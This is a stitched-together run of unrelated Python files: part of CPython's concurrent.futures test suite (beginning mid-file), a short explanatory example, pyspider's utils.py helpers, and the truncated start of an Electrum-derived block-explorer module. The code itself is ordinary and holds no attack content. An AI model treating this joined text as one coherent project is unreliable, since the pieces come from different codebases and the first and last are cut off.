oldinterval = geti() seti(1e-6 if newgil else 1) try: fs = {self.executor.submit(future_func) for i in range(100)} event.set() futures.wait(fs, return_when=futures.ALL_COMPLETED) finally: seti(oldinterval) create_executor_tests(WaitTests, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class AsCompletedTests: # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. 
def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) def test_duplicate_futures(self): # Issue 20367. Duplicate futures should not raise exceptions or give # duplicate responses. # Issue #31641: accept arbitrary iterables. future1 = self.executor.submit(time.sleep, 2) completed = [ f for f in futures.as_completed(itertools.repeat(future1, 3)) ] self.assertEqual(len(completed), 1) def test_free_reference_yielded_future(self): # Issue #14406: Generator should not keep references # to finished futures. futures_list = [Future() for _ in range(8)] futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED)) futures_list.append(create_future(state=FINISHED, result=42)) with self.assertRaises(futures.TimeoutError): for future in futures.as_completed(futures_list, timeout=0): futures_list.remove(future) wr = weakref.ref(future) del future test.support.gc_collect() self.assertIsNone(wr()) futures_list[0].set_result("test") for future in futures.as_completed(futures_list): futures_list.remove(future) wr = weakref.ref(future) del future test.support.gc_collect() self.assertIsNone(wr()) if futures_list: futures_list[0].set_result("test") def test_correct_timeout_exception_msg(self): futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE, RUNNING_FUTURE, SUCCESSFUL_FUTURE] with self.assertRaises(futures.TimeoutError) as cm: list(futures.as_completed(futures_list, timeout=0)) self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished') create_executor_tests(AsCompletedTests) class ExecutorTest: # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. 
def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) future = self.executor.submit(capture, 1, self=2, fn=3) self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3})) future = self.executor.submit(fn=capture, arg=1) self.assertEqual(future.result(), ((), {'arg': 1})) with self.assertRaises(TypeError): self.executor.submit(arg=1) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) self.assertEqual( list(self.executor.map(pow, range(10), range(10), chunksize=3)), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 6], timeout=5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) def test_shutdown_race_issue12456(self): # Issue #12456: race condition at shutdown where trying to post a # sentinel in the call queue blocks (the queue is full while processes # have exited). self.executor.map(str, [2] * (self.worker_count + 1)) self.executor.shutdown() @test.support.cpython_only def test_no_stale_references(self): # Issue #16284: check that the executors don't unnecessarily hang onto # references. my_object = MyObject() my_object_collected = threading.Event() my_object_callback = weakref.ref( my_object, lambda obj: my_object_collected.set()) # Deliberately discarding the future. self.executor.submit(my_object.my_method) del my_object collected = my_object_collected.wait(timeout=5.0) self.assertTrue(collected, "Stale reference not collected within timeout.") def test_max_workers_negative(self): for number in (0, -1): with self.assertRaisesRegex(ValueError, "max_workers must be greater " "than 0"): self.executor_type(max_workers=number) def test_free_reference(self): # Issue #14406: Result iterator should not keep an internal # reference to result objects. for obj in self.executor.map(make_dummy_object, range(10)): wr = weakref.ref(obj) del obj test.support.gc_collect() self.assertIsNone(wr()) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase): def test_map_submits_without_iteration(self): """Tests verifying issue 11777.""" finished = [] def record_finished(n): finished.append(n) self.executor.map(record_finished, range(10)) self.executor.shutdown(wait=True) self.assertCountEqual(finished, range(10)) def test_default_workers(self): executor = self.executor_type() self.assertEqual(executor._max_workers, (os.cpu_count() or 1) * 5) class ProcessPoolExecutorTest(ExecutorTest): @unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit') def test_max_workers_too_large(self): with self.assertRaisesRegex(ValueError, "max_workers must be <= 61"): futures.ProcessPoolExecutor(max_workers=62) def test_killed_child(self): # When a child process is abruptly terminated, the whole pool gets # "broken". futures = [self.executor.submit(time.sleep, 3)] # Get one of the processes, and terminate (kill) it p = next(iter(self.executor._processes.values())) p.terminate() for fut in futures: self.assertRaises(BrokenProcessPool, fut.result) # Submitting other jobs fails as well. 
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8) def test_map_chunksize(self): def bad_map(): list(self.executor.map(pow, range(40), range(40), chunksize=-1)) ref = list(map(pow, range(40), range(40))) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=6)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=50)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=40)), ref) self.assertRaises(ValueError, bad_map) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. future = self.executor.submit(self._test_traceback) with self.assertRaises(Exception) as cm: future.result() exc = cm.exception self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), futures.process._RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with test.support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) def test_ressources_gced_in_workers(self): # Ensure that argument for a job are correctly gc-ed after the job # is finished mgr = get_context(self.ctx).Manager() obj = EventfulGCObj(mgr) future = self.executor.submit(id, obj) future.result() self.assertTrue(obj.event.wait(timeout=1)) # explicitly destroy the object to ensure that EventfulGCObj.__del__() # is called while manager is still running. obj = None test.support.gc_collect() mgr.shutdown() mgr.join() create_executor_tests(ProcessPoolExecutorTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) def hide_process_stderr(): import io sys.stderr = io.StringIO() def _crash(delay=None): """Induces a segfault.""" if delay: time.sleep(delay) import faulthandler faulthandler.disable() faulthandler._sigsegv() def _exit(): """Induces a sys exit with exitcode 1.""" sys.exit(1) def _raise_error(Err): """Function that raises an Exception in process.""" hide_process_stderr() raise Err() def _return_instance(cls): """Function that returns a instance of cls.""" hide_process_stderr() return cls() class CrashAtPickle(object): """Bad object that triggers a segfault at pickling time.""" def __reduce__(self): _crash() class CrashAtUnpickle(object): """Bad object that triggers a segfault at unpickling time.""" def __reduce__(self): return _crash, () class ExitAtPickle(object): """Bad object that triggers a process exit at pickling time.""" def __reduce__(self): _exit() class ExitAtUnpickle(object): """Bad object that triggers a process exit at unpickling time.""" def __reduce__(self): return _exit, () class ErrorAtPickle(object): """Bad object that triggers an error at pickling time.""" def __reduce__(self): from pickle import PicklingError raise PicklingError("Error in pickle") class ErrorAtUnpickle(object): """Bad object that triggers an error at unpickling time.""" def __reduce__(self): from pickle import UnpicklingError return _raise_error, (UnpicklingError, ) class ExecutorDeadlockTest: TIMEOUT = 15 @classmethod def _sleep_id(cls, x, delay): time.sleep(delay) return x def _fail_on_deadlock(self, executor): # If we did not recover before TIMEOUT seconds, consider that the # executor is in a deadlock state and forcefully clean all its # composants. 
import faulthandler from tempfile import TemporaryFile with TemporaryFile(mode="w+") as f: faulthandler.dump_traceback(file=f) f.seek(0) tb = f.read() for p in executor._processes.values(): p.terminate() # This should be safe to call executor.shutdown here as all possible # deadlocks should have been broken. executor.shutdown(wait=True) print(f"\nTraceback:\n {tb}", file=sys.__stderr__) self.fail(f"Executor deadlock:\n\n{tb}") def test_crash(self): # extensive testing for deadlock caused by crashes in a pool. self.executor.shutdown(wait=True) crash_cases = [ # Check problem occurring while pickling a task in # the task_handler thread (id, (ErrorAtPickle(),), PicklingError, "error at task pickle"), # Check problem occurring while unpickling a task on workers (id, (ExitAtUnpickle(),), BrokenProcessPool, "exit at task unpickle"), (id, (ErrorAtUnpickle(),), BrokenProcessPool, "error at task unpickle"), (id, (CrashAtUnpickle(),), BrokenProcessPool, "crash at task unpickle"), # Check problem occurring during func execution on workers (_crash, (), BrokenProcessPool, "crash during func execution on worker"), (_exit, (), SystemExit, "exit during func execution on worker"), (_raise_error, (RuntimeError, ), RuntimeError, "error during func execution on worker"), # Check problem occurring while pickling a task result # on workers (_return_instance, (CrashAtPickle,), BrokenProcessPool, "crash during result pickle on worker"), (_return_instance, (ExitAtPickle,), SystemExit, "exit during result pickle on worker"), (_return_instance, (ErrorAtPickle,), PicklingError, "error during result pickle on worker"), # Check problem occurring while unpickling a task in # the result_handler thread (_return_instance, (ErrorAtUnpickle,), BrokenProcessPool, "error during result unpickle in result_handler"), (_return_instance, (ExitAtUnpickle,), BrokenProcessPool, "exit during result unpickle in result_handler") ] for func, args, error, name in crash_cases: with self.subTest(name): # The captured_stderr reduces the noise in the test report with test.support.captured_stderr(): executor = self.executor_type( max_workers=2, mp_context=get_context(self.ctx)) res = executor.submit(func, *args) with self.assertRaises(error): try: res.result(timeout=self.TIMEOUT) except futures.TimeoutError: # If we did not recover before TIMEOUT seconds, # consider that the executor is in a deadlock state self._fail_on_deadlock(executor) executor.shutdown(wait=True) def test_shutdown_deadlock(self): # Test that the pool calling shutdown do not cause deadlock # if a worker fails after the shutdown call. 
self.executor.shutdown(wait=True) with self.executor_type(max_workers=2, mp_context=get_context(self.ctx)) as executor: self.executor = executor # Allow clean up in fail_on_deadlock f = executor.submit(_crash, delay=.1) executor.shutdown(wait=True) with self.assertRaises(BrokenProcessPool): f.result() create_executor_tests(ExecutorDeadlockTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class FutureTests(BaseTestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with test.support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_done_callback_raises_already_succeeded(self): with test.support.captured_stderr() as stderr: def raising_fn(callback_future): raise Exception('doh!') f = Future() # Set the result first to simulate a future that runs instantly, # effectively allowing the callback to be run immediately. 
f.set_result(5) f.add_done_callback(raising_fn) self.assertIn('exception calling callback for', stderr.getvalue()) self.assertIn('doh!', stderr.getvalue()) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised OSError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=OSError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) t.join() def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. 
time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=5) t.join() def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), OSError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = OSError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=5), OSError)) t.join() @test.support.reap_threads def test_main(): try: test.support.run_unittest(__name__) finally: test.support.reap_children() multiprocessing.util._cleanup_tests() if __name__ == "__main__": test_main()
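The behaviours these tests pin down, wait() splitting futures into done and not-done sets and as_completed() yielding futures in completion order without duplicates, can be seen with a small self-contained example. The work() function and the four-worker thread pool below are arbitrary choices for illustration, not part of the test suite.

from concurrent.futures import ThreadPoolExecutor, wait, as_completed, FIRST_COMPLETED
import time

def work(n):
    time.sleep(n / 10.0)
    return n * n

if __name__ == "__main__":
    with ThreadPoolExecutor(max_workers=4) as executor:
        futures = [executor.submit(work, n) for n in range(5)]
        # wait() returns (done, not_done) sets, as the WaitTests above assert.
        done, not_done = wait(futures, return_when=FIRST_COMPLETED)
        print(len(done), "finished first,", len(not_done), "still pending")
        # as_completed() yields each future exactly once, in completion order,
        # as AsCompletedTests.test_duplicate_futures checks.
        for fut in as_completed(futures):
            print(fut.result())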
utils.py
#!/usr/bin/env python # -*- encoding: utf-8 -*- # vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8: # Author: Binux<i@binux.me> # http://binux.me # Created on 2012-11-06 11:50:13 import math import logging import hashlib import datetime import socket import base64 import warnings import threading from lxml.html import HtmlElement from pyquery import PyQuery from pyspider.database import connect_database import re import six from six import iteritems md5string = lambda x: hashlib.md5(utf8(x)).hexdigest() class ReadOnlyDict(dict): """A Read Only Dict""" def __setitem__(self, key, value): raise Exception("dict is read-only") def getitem(obj, key=0, default=None): """Get first element of list or return default""" try: return obj[key] except: return default def hide_me(tb, g=globals()): """Hide stack traceback of given stack""" base_tb = tb try: while tb and tb.tb_frame.f_globals is not g: tb = tb.tb_next while tb and tb.tb_frame.f_globals is g: tb = tb.tb_next except Exception as e: logging.exception(e) tb = base_tb if not tb: tb = base_tb return tb def run_in_thread(func, *args, **kwargs): """Run function in thread, return a Thread object""" from threading import Thread thread = Thread(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def run_in_subprocess(func, *args, **kwargs): """Run function in subprocess, return a Process object""" from multiprocessing import Process thread = Process(target=func, args=args, kwargs=kwargs) thread.daemon = True thread.start() return thread def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False): """Formats the given date (which should be GMT). By default, we return a relative time (e.g., "2 minutes ago"). You can return an absolute date string with ``relative=False``. You can force a full format date ("July 10, 1980") with ``full_format=True``. This method is primarily intended for dates in the past. For dates in the future, we fall back to full format. From tornado """ if not date: return '-' if isinstance(date, float) or isinstance(date, int): date = datetime.datetime.utcfromtimestamp(date) now = datetime.datetime.utcnow() if date > now: if relative and (date - now).seconds < 60: # Due to click skew, things are some things slightly # in the future. Round timestamps in the immediate # future down to now in relative mode. date = now else: # Otherwise, future dates always use the full format. 
full_format = True local_date = date - datetime.timedelta(minutes=gmt_offset) local_now = now - datetime.timedelta(minutes=gmt_offset) local_yesterday = local_now - datetime.timedelta(hours=24) difference = now - date seconds = difference.seconds days = difference.days format = None if not full_format: ret_, fff_format = fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday) format = fff_format if ret_: return format else: format = format if format is None: format = "%(month_name)s %(day)s, %(year)s" if shorter else \ "%(month_name)s %(day)s, %(year)s at %(time)s" str_time = "%d:%02d" % (local_date.hour, local_date.minute) return format % { "month_name": local_date.strftime('%b'), "weekday": local_date.strftime('%A'), "day": str(local_date.day), "year": str(local_date.year), "month": local_date.month, "time": str_time } def fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday): if relative and days == 0: if seconds < 50: return True, (("1 second ago" if seconds <= 1 else "%(seconds)d seconds ago") % {"seconds": seconds}) if seconds < 50 * 60: minutes = round(seconds / 60.0) return True, (("1 minute ago" if minutes <= 1 else "%(minutes)d minutes ago") % {"minutes": minutes}) hours = round(seconds / (60.0 * 60)) return True, (("1 hour ago" if hours <= 1 else "%(hours)d hours ago") % {"hours": hours}) format = None if days == 0: format = "%(time)s" elif days == 1 and local_date.day == local_yesterday.day and \ relative: format = "yesterday" if shorter else "yesterday at %(time)s" elif days < 5: format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s" elif days < 334: # 11mo, since confusing for same month last year format = "%(month)s-%(day)s" if shorter else \ "%(month)s-%(day)s at %(time)s" return False, format class TimeoutError(Exception): pass try: import signal if not hasattr(signal, 'SIGALRM'): raise ImportError('signal') class timeout: """ Time limit of command with timeout(3): time.sleep(10) """ def __init__(self, seconds=1, error_message='Timeout'): self.seconds = seconds self.error_message = error_message def handle_timeout(self, signum, frame): raise TimeoutError(self.error_message) def __enter__(self): if not isinstance(threading.current_thread(), threading._MainThread): logging.warning("timeout only works on main thread, are you running pyspider in threads?") self.seconds = 0 if self.seconds: signal.signal(signal.SIGALRM, self.handle_timeout) signal.alarm(int(math.ceil(self.seconds))) def __exit__(self, type, value, traceback): if self.seconds: signal.alarm(0) except ImportError as e: warnings.warn("timeout is not supported on your platform.", FutureWarning) class timeout: """ Time limit of command (for windows) """ def __init__(self, seconds=1, error_message='Timeout'): pass def __enter__(self): pass def __exit__(self, type, value, traceback): pass def utf8(string): """ Make sure string is utf8 encoded bytes. If parameter is a object, object.__str__ will been called before encode as bytes """ if isinstance(string, six.text_type): return string.encode('utf8') elif isinstance(string, six.binary_type): return string else: return six.text_type(string).encode('utf8') def text(string, encoding='utf8'): """ Make sure string is unicode type, decode with given encoding if it's not. 
If parameter is a object, object.__str__ will been called """ if isinstance(string, six.text_type): return string elif isinstance(string, six.binary_type): return string.decode(encoding) else: return six.text_type(string) def pretty_unicode(string): """ Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed. """ if isinstance(string, six.text_type): return string try: return string.decode("utf8") except UnicodeDecodeError: return string.decode('Latin-1').encode('unicode_escape').decode("utf8") def unicode_string(string): """ Make sure string is unicode, try to default with utf8, or base64 if failed. can been decode by `decode_unicode_string` """ if isinstance(string, six.text_type): return string try: return string.decode("utf8") except UnicodeDecodeError: return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]' def unicode_dict(_dict): """ Make sure keys and values of dict is unicode. """ r = {} for k, v in iteritems(_dict): r[unicode_obj(k)] = unicode_obj(v) return r def unicode_list(_list): """ Make sure every element in list is unicode. bytes will encode in base64 """ return [unicode_obj(x) for x in _list] def unicode_obj(obj): """ Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64. Can been decode by `decode_unicode_obj` """ if isinstance(obj, dict): return unicode_dict(obj) elif isinstance(obj, (list, tuple)): return unicode_list(obj) elif isinstance(obj, six.string_types): return unicode_string(obj) elif isinstance(obj, (int, float)): return obj elif obj is None: return obj else: try: return text(obj) except: return text(repr(obj)) def decode_unicode_string(string): """ Decode string encoded by `unicode_string` """ if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'): return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')]) return string def decode_unicode_obj(obj): """ Decode unicoded dict/list/tuple encoded by `unicode_obj` """ if isinstance(obj, dict): r = {} for k, v in iteritems(obj): r[decode_unicode_string(k)] = decode_unicode_obj(v) return r elif isinstance(obj, six.string_types): return decode_unicode_string(obj) elif isinstance(obj, (list, tuple)): return [decode_unicode_obj(x) for x in obj] else: return obj class Get(object): """ Lazy value calculate for object """ def __init__(self, getter): self.getter = getter def __get__(self, instance, owner): return self.getter() class ObjectDict(dict): """ Object like dict, every dict[key] can visite by dict.key If dict[key] is `Get`, calculate it's value. """ def __getattr__(self, name): ret = self.__getitem__(name) if hasattr(ret, '__get__'): return ret.__get__(self, ObjectDict) return ret def load_object(name): """Load object from module""" if "." 
not in name: raise Exception('load object need module.object') module_name, object_name = name.rsplit('.', 1) if six.PY2: module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1) else: module = __import__(module_name, globals(), locals(), [object_name]) return getattr(module, object_name) def get_python_console(namespace=None): """ Return an interactive python console instance with caller's stack """ if namespace is None: import inspect frame = inspect.currentframe() caller = frame.f_back if not caller: logging.error("can't find caller who started this console.") caller = frame namespace = dict(caller.f_globals) namespace.update(caller.f_locals) try: from IPython.terminal.interactiveshell import TerminalInteractiveShell shell = TerminalInteractiveShell(user_ns=namespace) except ImportError: try: import readline import rlcompleter readline.set_completer(rlcompleter.Completer(namespace).complete) readline.parse_and_bind("tab: complete") except ImportError: pass import code shell = code.InteractiveConsole(namespace) shell._quit = False def exit(): shell._quit = True def readfunc(prompt=""): if shell._quit: raise EOFError return six.moves.input(prompt) # inject exit method shell.ask_exit = exit shell.raw_input = readfunc return shell def python_console(namespace=None): """Start an interactive python console with caller's stack""" if namespace is None: import inspect frame = inspect.currentframe() caller = frame.f_back if not caller: logging.error("can't find caller who started this console.") caller = frame namespace = dict(caller.f_globals) namespace.update(caller.f_locals) return get_python_console(namespace=namespace).interact() def check_port_open(port, addr='127.0.0.1'): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((addr, port)) if result == 0: return True else: return False def get_xpath(node): assert isinstance(node, HtmlElement) or isinstance(node, PyQuery), 'type is error' node = node[0] if isinstance(node, PyQuery) else node return '//%s'%(node.getroottree().getelementpath(node)) def get_tag_name(node): return re.search('<[a-zA-Z][\s\>]', node.outerHtml()).group()[1:-1].lower() def matchcase(word): def replace(m): text = m.group() if text.isupper(): return word.upper() elif text.islower(): return word.lower() elif text[0].isupper(): return word.capitalize() else: return word return replace def get_db(db_str): db_obj = ObjectDict({}) db_obj.update({'db': Get(lambda: connect_database(db_str))}) return db_obj.db def is_all_url_exists(response, url_list): task_db = get_db(response.config['taskdb']) result_db = get_db(response.config['resultdb']) all_exists = True for index in range(len(url_list)-1, -1, -1): group = response.group if response.group else 'self_crawler' if not task_db.get_task(response.project, md5string(url_list[index])) and not [result for result in result_db.select(response.project, group, taskid=md5string(url_list[index]), fields=['taskid'])]: all_exists = False continue url_list.pop(index) return all_exists def is_need_to_paging(response, url_list): all_exists = is_all_url_exists(response, url_list) logging.info("is_need_to_paging project=%s, all_exists=%s, sequence=%s, can_page_num=%s"%(response.project, all_exists, response.sequence, response.page_num)) if response.page_num is not None and int(response.page_num) == 0: return False if response.sequence: return True return not all_exists def get_host_ip(): """ Query the local IP address of this machine :return: """ try: s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.connect(('8.8.8.8',80))
ip=s.getsockname()[0] finally: s.close() return ip
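The Get descriptor and ObjectDict class above combine into a small lazy-attribute pattern; get_db() relies on it so that connect_database() is only called when the .db attribute is actually read. A minimal sketch of that behaviour follows, assuming Get and ObjectDict from this file are in scope; expensive_connect is a hypothetical stand-in for connect_database, not part of the original module.

# Sketch only: Get and ObjectDict come from the module above; expensive_connect is made up.
def expensive_connect():
    print("connecting...")
    return {"connected": True}

d = ObjectDict({})
d.update({'db': Get(lambda: expensive_connect())})

conn = d.db   # the getter runs here, on first attribute access ("connecting..." is printed)
conn = d.db   # and runs again on every access -- Get does not cache its result

Because Get re-evaluates its getter on every access, callers that want a single shared connection should keep a reference to the value returned by the first access, which is what get_db() hands back.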
web.py
# Electrum - lightweight Bitcoin client # Copyright (C) 2011 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal import os import re import shutil import threading import urllib from .address import Address from . import bitcoin from . import networks from .util import format_satoshis_plain, bh2u, print_error DEFAULT_EXPLORER = "exploredvt.com" mainnet_block_explorers = { 'exploredvt.com': ('https://exploredvt.com/#/VITAE/mainnet', Address.FMT_CASHADDR, {'tx': 'tx', 'addr': 'address', 'block' : 'block'}), } DEFAULT_EXPLORER_TESTNET = 'exploredvt.com' testnet_block_explorers = { 'exploredvt.com' : ('https://exploredvt.com/#/VITAE/testnet', Address.FMT_CASHADDR, {'tx': 'tx', 'addr': 'address', 'block' : 'block'}), } def BE_info(): if networks.net.TESTNET: return testnet_block_explorers return mainnet_block_explorers def BE_tuple(config): infodict = BE_info() return (infodict.get(BE_from_config(config)) or 